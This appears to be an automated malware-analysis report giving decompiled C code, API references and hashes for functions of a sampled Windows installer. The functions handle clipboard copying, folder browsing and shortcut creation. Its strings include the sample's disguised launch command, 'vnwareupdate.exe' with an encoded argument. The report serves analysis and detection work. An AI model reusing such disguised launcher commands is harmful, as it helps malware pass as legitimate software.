String ID: $GhT$M$N
API String ID: 1638840714-2260926113
Opcode ID: 9b14bfcce48d0d769f086a49a0ef55ef456572940aa0dac0a86a005e500a94a8
Instruction ID: 8b31743f23cd8b0b58ed2b5f291beccc42c2d4f26c41c681c3135c74bfbc6718
Opcode Fuzzy Hash: 9b14bfcce48d0d769f086a49a0ef55ef456572940aa0dac0a86a005e500a94a8
Instruction Fuzzy Hash: 9D027FB0A00209AFEB20DF55DD85AAE7BB5FB84314F14413AF610B62E1C7799D52CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00405205, Relevance: 54.3, APIs: 36, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00405205(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x42ebe4; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405199, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E00405FC2(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x42a870;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x42ebcc - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42f408, 8);
							__eflags =  *0x42f4ac - _t150;
							if( *0x42f4ac == _t150) {
								E004050C7( *((intOrPtr*)( *0x42a048 + 0x34)), _t150);
							}
							E00404018(1);
							goto L25;
						}
						 *0x429c40 = 2;
						E00404018(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E004040A6(_t157, _a12, _a16);
						}
						ShowWindow( *0x42ebd0, _t150);
						ShowWindow(_v8, 8);
						E00404074(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x42f414;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x42ebd0 = GetDlgItem(_a4, 0x403);
				 *0x42ebc8 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x42ebe4 = _t128;
				_v8 = _t128;
				E00404074( *0x42ebd0);
				 *0x42ebd4 = E00404965(4);
				 *0x42ebec = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E0040403F(_a4);
				if(( *0x42f41c & 0x00000003) != 0) {
					ShowWindow( *0x42ebd0, _t150);
					if(( *0x42f41c & 0x00000002) != 0) {
						 *0x42ebd0 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404074( *0x42ebc8);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42f41c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}

0x0040520b
0x00405213
0x00405216
0x0040521e
0x00405221
0x004053b0
0x004053b6
0x004053da
0x004053da
0x004053e6
0x004053ec
0x0040540e
0x0040540e
0x00405414
0x00405469
0x00405469
0x0040546c
0x00000000
0x00000000
0x0040546e
0x00405471
0x00405474
0x00000000
0x00000000
0x0040547e
0x00405484
0x00405486
0x00405489
0x00405586
0x00000000
0x00405586
0x00405498
0x004054a4
0x004054ad
0x004054b4
0x004054b8
0x004054bb
0x004054c4
0x004054ca
0x004054cd
0x004054cd
0x004054dd
0x004054e3
0x004054e6
0x004054f1
0x004054f1
0x004054f2
0x004054f5
0x004054fc
0x00405503
0x0040550b
0x0040550b
0x00405519
0x0040551f
0x00405522
0x00405522
0x00405529
0x0040552f
0x00405538
0x0040553f
0x00405548
0x0040554a
0x0040554d
0x0040555c
0x0040555e
0x00405561
0x00405562
0x00405565
0x00405566
0x00405567
0x00405567
0x0040556f
0x0040557a
0x00405580
0x00405580
0x00000000
0x004054e6
0x00405416
0x0040541c
0x0040544a
0x0040544c
0x00405452
0x0040545d
0x0040545d
0x00405464
0x00000000
0x00405464
0x00405420
0x0040542a
0x00000000
0x004053ee
0x004053ee
0x004053f4
0x0040542f
0x00000000
0x00405436
0x004053fd
0x00405404
0x00405409
0x00000000
0x00405409
0x004053ec
0x00405227
0x0040522b
0x00405233
0x00405237
0x0040523a
0x0040523d
0x00405240
0x00405243
0x00405244
0x00405245
0x0040525e
0x00405261
0x0040526b
0x0040527a
0x00405282
0x0040528a
0x0040528f
0x00405292
0x0040529e
0x004052a7
0x004052b0
0x004052d2
0x004052d8
0x004052e9
0x004052ee
0x004052fc
0x0040530a
0x0040530a
0x0040530f
0x0040531d
0x0040531d
0x00405322
0x00405325
0x0040532a
0x00405336
0x0040533f
0x0040534c
0x0040535b
0x0040534e
0x00405353
0x00405353
0x00405367
0x00405367
0x0040537b
0x00405384
0x0040538d
0x0040539d
0x004053a9
0x004053a9
0x00000000

APIs

GetDlgItem.USER32 ref: 00405264
GetDlgItem.USER32 ref: 00405273
GetClientRect.USER32 ref: 004052B0
GetSystemMetrics.USER32 ref: 004052B7
SendMessageA.USER32(?,0000101B,00000000,?), ref: 004052D8
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052E9
SendMessageA.USER32(?,00001001,00000000,?), ref: 004052FC
SendMessageA.USER32(?,00001026,00000000,?), ref: 0040530A
SendMessageA.USER32(?,00001024,00000000,?), ref: 0040531D
ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040533F
ShowWindow.USER32(?,00000008), ref: 00405353
GetDlgItem.USER32 ref: 00405374
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405384
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040539D
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053A9
GetDlgItem.USER32 ref: 00405282

Part of subcall function 00404074: SendMessageA.USER32(00000028,?,00000001,00403EA4), ref: 00404082

GetDlgItem.USER32 ref: 004053C5
CreateThread.KERNEL32 ref: 004053D3
CloseHandle.KERNEL32(00000000), ref: 004053DA
ShowWindow.USER32(00000000), ref: 004053FD
ShowWindow.USER32(?,00000008), ref: 00405404
ShowWindow.USER32(00000008), ref: 0040544A
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040547E
CreatePopupMenu.USER32 ref: 0040548F
AppendMenuA.USER32 ref: 004054A4
GetWindowRect.USER32 ref: 004054C4
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054DD
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405519
OpenClipboard.USER32(00000000), ref: 00405529
EmptyClipboard.USER32 ref: 0040552F
GlobalAlloc.KERNEL32(00000042,?), ref: 00405538
GlobalLock.KERNEL32 ref: 00405542
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405556
GlobalUnlock.KERNEL32(00000000), ref: 0040556F
SetClipboardData.USER32 ref: 0040557A
CloseClipboard.USER32 ref: 00405580

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID:
API String ID: 590372296-0
Opcode ID: e4850145c29fa6a118fc99cbce2f78c5114ccbb4892c913cd041fdaee94a6f36
Instruction ID: f54484deaadc53d59d965fa3ad24bc50442bab3dbb2bc57f5e3c058b1bd1a4dd
Opcode Fuzzy Hash: e4850145c29fa6a118fc99cbce2f78c5114ccbb4892c913cd041fdaee94a6f36
Instruction Fuzzy Hash: 10A14871900608BFDB11AF61DE89AAF7F79FB08354F40403AFA41B61A0C7754E519F68

Uniqueness

Uniqueness Score: -1.00%

Function 004044D1, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E004044D1(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42a048;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E004056A0(0x3fb, _t146);
					E0040620A(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004056A0(0x3fb, _t146);
							if(E00405A26(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405FA0(0x429840, _t146);
							_t87 = E00406338(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405FA0(0x429840, _t146);
								_t89 = E004059D1(0x429840);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429840,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429840) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429840,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E0040597F(0x429840);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429840) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404965(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42ebdc; // 0x546847
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E0040494D(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429830);
									} else {
										E00404888(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42f4c4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00404061(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42a860 == _t158) {
									E0040442A();
								}
								 *0x42a860 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a870;
							_v60 = E00404822;
							_v56 = _t146;
							_v68 = E00405FC2(_t146, 0x42a870, _t166, 0x429c48, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405938(_t146);
								_t125 =  *((intOrPtr*)( *0x42f414 + 0x11c));
								if( *((intOrPtr*)( *0x42f414 + 0x11c)) != 0 && _t146 == "C:\\Users\\hardz\\Desktop") {
									E00405FC2(_t146, 0x42a870, _t166, 0, _t125);
									if(lstrcmpiA(0x42e3a0, 0x42a870) != 0) {
										lstrcatA(_t146, 0x42e3a0);
									}
								}
								 *0x42a860 =  *0x42a860 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E004059A5(_t146) != 0 && E004059D1(_t146) == 0) {
						E00405938(_t146);
					}
					 *0x42ebd8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E0040403F(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E0040403F(_t166);
					E00404074(_t165);
					_t138 = E00406338(7);
					if(_t138 == 0) {
						L53:
						return E004040A6(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}

0x004044d1
0x004044d7
0x004044dd
0x004044ea
0x004044f8
0x004044fb
0x00404503
0x00404509
0x00404509
0x00404515
0x00404518
0x00404586
0x0040458d
0x00404664
0x0040466b
0x0040467a
0x0040467a
0x0040467e
0x00404688
0x00404695
0x00404697
0x00404697
0x004046a5
0x004046ac
0x004046b3
0x004046b6
0x004046ed
0x004046ef
0x004046f5
0x004046fa
0x004046fe
0x00404700
0x00404700
0x0040471c
0x00000000
0x0040471e
0x00404721
0x0040472f
0x00404735
0x00404736
0x00404739
0x0040473c
0x00000000
0x0040473c
0x004046b8
0x004046ba
0x004046be
0x00000000
0x00000000
0x00000000
0x00000000
0x004046c0
0x004046c0
0x004046cd
0x004046d2
0x00000000
0x00000000
0x004046d6
0x004046d8
0x004046d8
0x004046e0
0x004046e2
0x004046e5
0x004046e8
0x004046eb
0x00000000
0x00000000
0x00000000
0x00000000
0x004046eb
0x00404748
0x00404752
0x00404755
0x00404758
0x0040475f
0x0040475f
0x00404761
0x00404761
0x00404766
0x00404768
0x00404770
0x00404777
0x00404779
0x00404784
0x00404784
0x00404779
0x0040478b
0x00404794
0x0040479e
0x004047a6
0x004047c1
0x004047a8
0x004047b1
0x004047b1
0x004047a6
0x004047c6
0x004047cb
0x004047d0
0x004047d9
0x004047d9
0x004047e2
0x004047e4
0x004047e4
0x004047f0
0x004047f8
0x00404802
0x00404802
0x00404807
0x00000000
0x00404807
0x004046b6
0x0040466d
0x00404674
0x00000000
0x00000000
0x00000000
0x00404674
0x00404593
0x0040459c
0x004045b6
0x004045bb
0x004045c5
0x004045cc
0x004045d8
0x004045db
0x004045de
0x004045e5
0x004045ed
0x004045f0
0x004045f4
0x004045fb
0x00404603
0x0040465d
0x00404605
0x00404606
0x0040460d
0x00404617
0x0040461f
0x0040462c
0x00404640
0x00404644
0x00404644
0x00404640
0x00404649
0x00404656
0x00404656
0x00404603
0x00000000
0x004045bb
0x004045a9
0x00000000
0x00000000
0x004045af
0x00000000
0x0040451a
0x00404527
0x00404530
0x0040453d
0x0040453d
0x00404544
0x0040454a
0x00404553
0x00404556
0x00404559
0x00404561
0x00404564
0x00404567
0x0040456d
0x00404574
0x0040457b
0x0040480d
0x0040481f
0x00404581
0x00404584
0x00000000
0x00404584
0x0040457b

APIs

GetDlgItem.USER32 ref: 00404520
SetWindowTextA.USER32(00000000,?), ref: 0040454A
SHBrowseForFolderA.SHELL32(?,00429C48,?), ref: 004045FB
CoTaskMemFree.OLE32(00000000), ref: 00404606
lstrcmpiA.KERNEL32("C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD,0042A870,00000000,?,?), ref: 00404638
lstrcatA.KERNEL32(?,"C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD), ref: 00404644
SetDlgItemTextA.USER32 ref: 00404656

Part of subcall function 004056A0: GetDlgItemTextA.USER32 ref: 004056B3

Part of subcall function 0040620A: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\GZe6EcSTpO.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406262
Part of subcall function 0040620A: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040626F
Part of subcall function 0040620A: CharNextA.USER32(?,"C:\Users\user\Desktop\GZe6EcSTpO.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406274
Part of subcall function 0040620A: CharPrevA.USER32(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406284

GetDiskFreeSpaceA.KERNEL32(00429840,?,?,0000040F,?,00429840,00429840,?,00000001,00429840,?,?,000003FB,?), ref: 00404714
MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040472F

Part of subcall function 00404888: lstrlenA.KERNEL32(0042A870,0042A870,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
Part of subcall function 00404888: wsprintfA.USER32 ref: 0040492E
Part of subcall function 00404888: SetDlgItemTextA.USER32 ref: 00404941

Strings

GhT, xrefs: 0040478B
A, xrefs: 004045F4
C:\Users\user\Desktop, xrefs: 00404621
"C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD, xrefs: 00404632, 00404637, 00404642

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD$A$C:\Users\user\Desktop$GhT
API String ID: 2624150263-861617607
Opcode ID: cdde6bf5d860e80b1670e7dcdf7f51639cc8ffce7cf8acda1903fa5029e0e2f5
Instruction ID: e7408234a4186d1eb777f56003ea07db5a22e6c17a70b9954916109459a63af9
Opcode Fuzzy Hash: cdde6bf5d860e80b1670e7dcdf7f51639cc8ffce7cf8acda1903fa5029e0e2f5
Instruction Fuzzy Hash: EEA170B1900219ABDB11EFA6CD41AAF77B8EF85314F50843BF601B62D1DB7C89418B6D

Uniqueness

Uniqueness Score: -1.00%

Function 004020D1, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E004020D1() {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x3c) = E00402ACB(0xfffffff0);
				 *(_t111 - 0xc) = E00402ACB(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x80)) = E00402ACB(2);
				 *((intOrPtr*)(_t111 - 0x7c)) = E00402ACB(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402ACB(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x88) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x78) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E004059A5( *(_t111 - 0xc)) == 0) {
					E00402ACB(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x40851c, _t87, 1, 0x40850c, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x40852c, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\hardz\\Desktop");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x78));
						_t95 =  *((intOrPtr*)(_t111 - 0x7c));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x88));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x80)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x34)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x3c), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}

0x004020da
0x004020e4
0x004020ee
0x004020f8
0x00402103
0x00402106
0x00402120
0x00402126
0x0040212c
0x0040212f
0x00402139
0x0040213d
0x0040213d
0x00402142
0x00402153
0x0040215b
0x00402234
0x00402234
0x0040223b
0x00402161
0x00402161
0x00402170
0x00402174
0x00402177
0x0040217d
0x0040218b
0x0040218e
0x00402190
0x0040219b
0x0040219b
0x004021a0
0x004021a2
0x004021a9
0x004021a9
0x004021ac
0x004021b5
0x004021b8
0x004021bd
0x004021bf
0x004021cc
0x004021cc
0x004021cf
0x004021d8
0x004021db
0x004021e4
0x004021ea
0x004021f1
0x0040220a
0x0040220c
0x0040221a
0x0040221a
0x0040220a
0x0040221d
0x00402223
0x00402223
0x00402226
0x0040222c
0x00402232
0x00402247
0x00000000
0x00000000
0x00000000
0x00402232
0x0040223d
0x0040295a
0x00402966

APIs

CoCreateInstance.OLE32(0040851C,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402153
